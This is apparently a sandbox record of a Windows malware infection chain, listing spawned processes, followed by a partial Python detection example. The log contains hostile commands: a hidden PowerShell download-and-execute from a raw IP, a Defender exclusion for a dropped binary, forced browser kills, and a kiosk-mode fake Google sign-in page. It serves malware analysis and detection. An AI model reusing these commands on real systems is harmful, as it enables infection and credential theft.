"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2EED.tmp\2EEE.tmp\2EEF.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe

"C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"

C:\Users\Admin\AppData\Local\Temp\dll32.exe

"C:\Users\Admin\AppData\Local\Temp\dll32.exe"

C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd"

C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1204

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 508

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 1016

C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 500

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\8QpbZ8u9\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe

"C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\chromium.exe

C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe

"C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Users\Admin\AppData\Local\Temp\dll32.exe

"C:\Users\Admin\AppData\Local\Temp\dll32.exe"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe

"C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 1200

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe

"C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe

"C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.0.1337352138\1171607553" -parentBuildID 20221007134813 -prefsHandle 1244 -prefMapHandle 1196 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd1ffbe0-fde8-41f7-b9f5-a2e143d89b2a} 300 "\\.\pipe\gecko-crash-server-pipe.300" 1324 106dbe58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.1.971295469\132527329" -parentBuildID 20221007134813 -prefsHandle 1540 -prefMapHandle 1536 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c80145c5-498f-4946-8dad-2f2b8108cd90} 300 "\\.\pipe\gecko-crash-server-pipe.300" 1552 f3eb258 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.2.1791177149\199354410" -childID 1 -isForBrowser -prefsHandle 2208 -prefMapHandle 2204 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a58b41a8-2a8b-4824-ab7a-c6cedf00c3b9} 300 "\\.\pipe\gecko-crash-server-pipe.300" 2220 175d9258 tab

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.3.1120652361\535779563" -childID 2 -isForBrowser -prefsHandle 2704 -prefMapHandle 2640 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5a22e55-3f41-49f6-9837-3c5a9ea8369b} 300 "\\.\pipe\gecko-crash-server-pipe.300" 2776 1d70a658 tab

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.4.1509203630\1168830996" -childID 3 -isForBrowser -prefsHandle 3660 -prefMapHandle 3768 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {761025cf-1ac0-4ad9-91e7-7c0357446cb6} 300 "\\.\pipe\gecko-crash-server-pipe.300" 3796 e69758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.5.1702620004\829867254" -childID 4 -isForBrowser -prefsHandle 3904 -prefMapHandle 3908 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5a7969e-1401-43b1-b1cd-37389839b617} 300 "\\.\pipe\gecko-crash-server-pipe.300" 3892 1b84d658 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.6.705501292\1687976917" -childID 5 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90f30b2a-17ac-4871-b956-62a0716fd10e} 300 "\\.\pipe\gecko-crash-server-pipe.300" 4052 1b84dc58 tab

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe

"C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe

"C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 1212

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"
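Two patterns in the listing above are worth turning into detection logic: the batch loop that polls `Tasklist /fi "PID eq 2300"` piped to `find ":"` once a second (the `tmp1065.tmp.bat` launched via `cmd /C ... & Del ...` deletes itself after running), and the sequence of `taskkill /F /IM <browser> /T` followed by Firefox started in `--kiosk` mode on a URL built to look like a Google sign-in challenge. The example below is added here and is not part of the report; the process records are constructed to mirror those command lines, and the PIDs 2880 and 2700 and the parent/child pairing are assumptions made for the sample, not values from the report.

```python
"""Detection logic for the batch wait-loop and the kiosk-mode browser lure.

Added example, not part of the sandbox report or any vendor's code. The
events below are constructed to mirror the command lines in the process
listing; PIDs 2880/2700 and the parent/child pairing are assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}
PID_FILTER = re.compile(r'tasklist\s+/fi\s+"PID eq (\d+)"', re.IGNORECASE)
TASKKILL = re.compile(r"taskkill\s+/F\s+/IM\s+(\S+)", re.IGNORECASE)
KIOSK_URL = re.compile(r'--kiosk\s+"?(https?://\S+?)"?(?:\s|$)', re.IGNORECASE)
# cmd /C <x>.bat & Del <x>.bat: the batch file removes itself after running.
SELF_DELETE_BAT = re.compile(r"/C\s+(\S+\.bat)\s*&\s*Del\s+\1", re.IGNORECASE)
LURE_WORDS = re.compile(r"signin|login|account|password|pwd", re.IGNORECASE)


@dataclass(frozen=True)
class Event:
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


# Constructed sample, in execution order (assumed PIDs).
SAMPLE_EVENTS = [
    Event(2880, 2300, r"C:\Windows\System32\cmd.exe",
          r'"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat'
          r" & Del C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat"),
    Event(3001, 2880, r"C:\Windows\system32\chcp.com", "chcp 65001"),
    Event(3002, 2880, r"C:\Windows\system32\timeout.exe", "Timeout /T 1 /Nobreak"),
    Event(3003, 2880, r"C:\Windows\system32\tasklist.exe", 'Tasklist /fi "PID eq 2300"'),
    Event(3004, 2880, r"C:\Windows\system32\find.exe", 'find ":"'),
    Event(3005, 2880, r"C:\Windows\system32\timeout.exe", "Timeout /T 1 /Nobreak"),
    Event(3006, 2880, r"C:\Windows\system32\tasklist.exe", 'Tasklist /fi "PID eq 2300"'),
    Event(3007, 2880, r"C:\Windows\system32\find.exe", 'find ":"'),
    Event(3100, 2700, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /F /IM firefox.exe /T"),
    Event(3101, 2700, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /F /IM chrome.exe /T"),
    Event(3102, 2700, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /F /IM msedge.exe /T"),
    Event(3103, 2700, r"C:\Program Files\Mozilla Firefox\firefox.exe",
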